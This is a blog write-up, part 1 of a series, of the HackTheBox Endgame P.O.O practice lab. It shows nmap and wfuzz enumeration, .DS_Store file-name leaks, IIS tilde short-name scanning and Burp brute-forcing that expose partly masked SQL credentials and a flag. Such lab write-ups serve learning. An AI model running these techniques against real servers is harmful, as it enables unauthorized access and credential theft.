by Since HTB started to release insane machines back to back I’m having a lot of free time. As I’m now with working on 2 machines without success for last 10 days, I decided to work on Endgame P.O.O, hence this article.
- PART 1: HackTheBox Endgame P.O.O Writeup Part 1 – Recon (Flag 01/05)
- PART 2: HackTheBox Endgame P.O.O Writeup Part 2 – Huh?! (Flag 02/05)
- PART 3: HackTheBox Endgame P.O.O Writeup Part 3 – BackTrack (Flag 03/05)
- PART 4: HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05)
- PART 5: p00ned (Coming soon)
P.O.O is a Windows Active Directory environment with a domain controller and a Microsoft SQL server 2016. All you have is 2 open ports: an HTTP on the port 80 and SQL Server 2016 running on the port 1433. Working on P.O.O is most realistic real-life like experience. As I like working on Windows based machines, this is like a feast for me.
There are 5 flags you need to capture in the right order, Recon, Huh?!, BackTrack, Foothold and p00ned. As per HTB machine intro, The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.
Let us start.
Enumeration
As the best practice, I always add machine IP 10.13.38.11 to my etc/hosts as poo.htb. It will be easy to remember wile scanning instead of IP address.
NMAP SCANNING
I started off with full port scan.
After nmap scanning I found a couple of open ports, 80/TCP running an IIS HTTPD server and port 1433 running Microsoft SQL server. Nmap as well revealed the machine belongs to Windows AD DC intranet.poo and the computers name is COMPATIBILITY.intranet.poo.
After scanning, I opened the websites on the default http port 80. It was just an IIS default website nothing else I was able to find. So as the next step I decided to look for possible hidden directories that might help me to enumerate further.
I used FUZZ to enumerate the directories using Seclist’s all.txt wordlist.
wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZFuzz discovered around 75 directories and files. Most fo them are unreadable or 404. I was not able to list the php files as the file name was not clear. The cURL didn’t work either. The top result /admin/ need credentials, so at this point I’m clueless.
# root @ ns09 in ~/htb/poo [17:35:03]
$ wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://poo.htb/FUZZ
Total requests: 43134
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000014: 401 29 L 100 W 1293 Ch "admin"
000000268: 301 1 L 10 W 146 Ch "uploads"
000000297: 301 1 L 10 W 145 Ch "themes"
000000358: 301 1 L 10 W 146 Ch "plugins"
000000398: 301 1 L 10 W 145 Ch "images"
000000504: 301 1 L 10 W 148 Ch "templates"
000000798: 200 50 L 156 W 10244 Ch ".DS_Store"
000001113: 301 1 L 10 W 146 Ch "widgets"
000003111: 301 1 L 10 W 147 Ch "META-INF"
000003114: 301 1 L 10 W 142 Ch "dev"
000003218: 200 31 L 55 W 703 Ch "????.txt"
000004923: 200 31 L 55 W 703 Ch "??"
000004924: 200 31 L 55 W 703 Ch "??.txt"
000005879: 400 6 L 26 W 324 Ch "%%45^45E^45E480CD%%index.tpl.php"
000006500: 200 31 L 55 W 703 Ch "????"
000006975: 400 6 L 26 W 324 Ch "%%F7^F7F^F7F34188%%header.tpl.php"
000007698: 400 6 L 26 W 324 Ch "%%0E^0E4^0E407559%%footer.tpl.php"
000008511: 301 1 L 10 W 151 Ch "New Folder"
000011402: 200 31 L 55 W 703 Ch "????.rar"
000011781: 400 6 L 26 W 324 Ch "%%6A^6A5^6A537DD8%%login.tpl.php"
000011782: 200 31 L 55 W 703 Ch "?????"
000012428: 200 31 L 55 W 703 Ch "???"
000012715: 200 31 L 55 W 703 Ch "?? ????.txt"
000013366: 200 31 L 55 W 703 Ch "????.html"
000014883: 200 31 L 55 W 703 Ch "??????.xls"
000016417: 200 31 L 55 W 703 Ch "???????.rar"
//-----SNIP------
Total time: 593.6598
Processed Requests: 43134
Filtered Requests: 43059
Requests/sec.: 72.65776 I started to look each directory and file one by one until I noticed “.DS_Store”. The .DS_Store or Desktop Services Store is a Mac Apple OSX system file that contains the information and attribute or meta-data of the folder it belongs to. I know that DS_Store file can be exploited using several tools to disclose the information it contains.
A quick Google search showed me a couple of exploits and a HackerOne disclosure that exposed the Twitter’s internal network and Mac package information. The Hacker took away with $560 bounty for this very simple find.
The exploits and articles I found:
- https://omespino.com/write-up-file-disclosure-via-ds_store-file-macos/
- https://miloserdov.org/?p=3867
- https://0day.work/parsing-the-ds_store-file-format/
- https://github.com/gehaxelt/Python-dsstore Exploit I used.
- https://github.com/lijiejie/ds_store_exp – Exploit I used.
As the file .DS_Store is known for its major security flaw, I decided to concentrate more on the file instead looking for more exploits.
The first exploit I used I didn’t get much information, so I tried the exploit called “ds_store_exp”.
# root @ ns09 in ~/htb/poo [20:23:02]
$ python /root/ds_store_exp/ds_store_exp.py http://poo.htb/.DS_Store
[200] http://poo.htb/.DS_Store
[!] 'InvalidURL' object has no attribute 'code'
[!] 'InvalidURL' object has no attribute 'code'
[401] http://poo.htb/admin
[401] http://poo.htb/admin/.DS_Store
[200] http://poo.htb/Widgets/.DS_Store
[200] http://poo.htb/dev/.DS_Store
[200] http://poo.htb/JS/.DS_Store
[403] http://poo.htb/Templates
[403] http://poo.htb/Widgets
[200] http://poo.htb/Themes/.DS_Store
[403] http://poo.htb/JS
[403] http://poo.htb/dev
[!] 'InvalidURL' object has no attribute 'code'
[!] 'InvalidURL' object has no attribute 'code'
[403] http://poo.htb/Themes
[200] http://poo.htb/Images/.DS_Store
[403] http://poo.htb/Uploads
[200] http://poo.htb/iisstart.htm
[403] http://poo.htb/Plugins
[403] http://poo.htb/Images
[403] http://poo.htb/META-INF
[200] http://poo.htb/Widgets/Framework/.DS_Store
[403] http://poo.htb/Widgets/Menu
[200] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/.DS_Store
[403] http://poo.htb/Widgets/Framework
[200] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/.DS_Store
[403] http://poo.htb/Widgets/Notifications
[403] http://poo.htb/Widgets/CalendarEvents
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1
[403] http://poo.htb/JS/custom
[403] http://poo.htb/Themes/default
[403] http://poo.htb/Images/buttons
[200] http://poo.htb/Widgets/Framework/Layouts/.DS_Store
[403] http://poo.htb/Images/icons
[200] http://poo.htb/Images/iisstart.png
[403] http://poo.htb/Widgets/Framework/Layouts
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/core
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/include
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/src
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/core
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/include
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/db
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/src
[403] http://poo.htb/Widgets/Framework/Layouts/default
[403] http://poo.htb/Widgets/Framework/Layouts/custom
Found a lot of directories after running the second scanner, however most of them are restricted. There are a couple of DS Stores I found again I inside the directrices but after reading them they seem to have some name of the files within the /dev/ directory.
After a long reading and understanding the files within the dev/ directory I understood that the folder somewhat related to IIS. A couple of posts in HTB forums suggest there is an “infoleak vulnerability” which I couldn’t find yet. At this moment I’m certain that the exploit point is IIS and the directories shows from the exploit of DS Store. But I can’t see them yet.
After reading about IIS vulnerabilities specifically IIS unauthorized information disclosure “and exploits I concentrated by search on “IIS short name vulnerability”. This vulnerability is caused by the tilde character (~) with the old DOS 8.3 name convention (SFN) in an HTTP request. It allows a remote attacker to disclose file and folder names (that are not supposed to be accessible) under the web root. (https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability).
An Acunetix article on Microsoft IIS tide directory enumeration vulnerability led me to an exploit on GitHub.
I download the git and start the scanning of the directories I discovered using “ds_store_exp.py”. This exploit scans the given url and tries to exploit it and revels real names. The script returns with the message if server is not vulnerable or not based on the 404 or any restrictions IIS may have.
# root @ ns09 in ~/---/---- on git:master o [22:45:06]
$ python2 ---.py http://poo.htb/admin
# root @ ns09 in root @ ns09 in ~/---/---- on git:master o on git:master o [22:45:41]
$ python2 --.py http://poo.htb/admin/.DS_Store
# root @ ns09 in root @ ns09 in ~/---/---- on git:master o on git:master o [22:46:08]
$ python2 ---.py http://poo.htb/JS
[+] /JS/d~1.* [scan in progress]
[+] /JS/ds~1.* [scan in progress]
[+] /JS/ds_~1.* [scan in progress]
[+] /JS/ds_s~1.* [scan in progress]
[+] /JS/ds_st~1.* [scan in progress]
[+] /JS/ds_sto~1.* [scan in progress]
[+] /JS/ds_sto~1 [scan in progress]
[+] Directory /JS/ds_sto~1 [Done]
----------------------------------------------------------------
Dir: /JS/ds_sto~1
----------------------------------------------------------------
1 Directories, 0 Files found in total
# root @ ns09 in ---- on git:master o [22:46:40]
$ python2 --.py http://poo.htb/META-INF
Server is not vulnerable
# root @ ns09 in --- on git:master o [22:47:01]
$ python2 --.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc
[+] /dev/dca66d38fd916317687e1390a420c3fc/d~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_s~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_st~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_sto~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_sto~1 [scan in progress]
[+] Directory /dev/dca66d38fd916317687e1390a420c3fc/ds_sto~1 [Done]
----------------------------------------------------------------
Dir: /dev/dca66d38fd916317687e1390a420c3fc/ds_sto~1
----------------------------------------------------------------
1 Directories, 0 Files found in total
# root @ ns09 in on git:master o [22:47:42]
$ python2 ---.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/core
# root @ ns09 in --- on git:master o [22:48:06]
$ python2 i--.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/include
# root @ ns09 in --- on git:master o [22:48:23]
$ python2 ---.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db
Server is vulnerable, please wait, scanning...
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/p~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/po~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [scan in progress]
[+] File /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
0 Directories, 1 Files found in total
# root @ ns09 in --- on git:master o [22:49:30]
$ python2 --.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/src
# root @ ns09 in -- on git:master o [22:51:01]
$ python2 --.py http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/core
# root @ ns09 in -- on git:master o [22:51:16]
$ python2 --.py http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/include
# root @ ns09 in -- git:master o [22:51:29]
$ python2 -- http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/db
Scanning....
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/p~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/po~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_c~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.t* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.tx* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt* [scan in progress]
[+] File /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*
----------------------------------------------------------------
0 Directories, 1 Files found in total
# root @ ns09 in ---- on git:master o [22:52:03]
$ --.py http://poo.htb/Widgets/Framework/Layouts/default
# root @ ns09 in -- on git:master o [22:52:27]
$ python2 --.py http://poo.htb/Widgets/Framework/Layouts/custom After running and reading the results (I intentionally snipped the results and the script name) I saw the only useful directory is “http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/db”. There is a file “/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt” with an incomplete name.
I tried several minutes to test the words starts coxxxxxxxx.txt manually, but seemed very difficult, so decided to automate process by brute forcing the directory /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt using Burp suit.
I intercept the request like below and made a list of words starting with “COxxxxxxx” combing them into a new wordlist to make Burpsuit intruder to brute force.
I set the payload position as below and started the attack using the default attack type.
And within a few minutes, I have the exact match “connection” appeared with status “200”.
First Flag – Recon
Ok, here is the first flag of POO Recon.
SERVER=10.13.38.11
USERID=ext[-----------]ser
DBNAME=P[-------]C
USERPWD=#p00P[----------]s3r#
Flag : POO{fc[----------------]55}The flag as well contains the possible leads to next step. A username, SQL DB name and password.
Thank you for reading, stay tuned for Part2 ” Huh?! ”
[…] Previous Post Previous post: HackTheBox Endgame P.O.O Writeup Part 1 – Recon (Flag 01/05) […]
[…] HackTheBox Endgame P.O.O Writeup Part 1 – Recon (Flag 01/05) […]
[…] HackTheBox Endgame P.O.O Writeup Part 1 – Recon (Flag 01/05) […]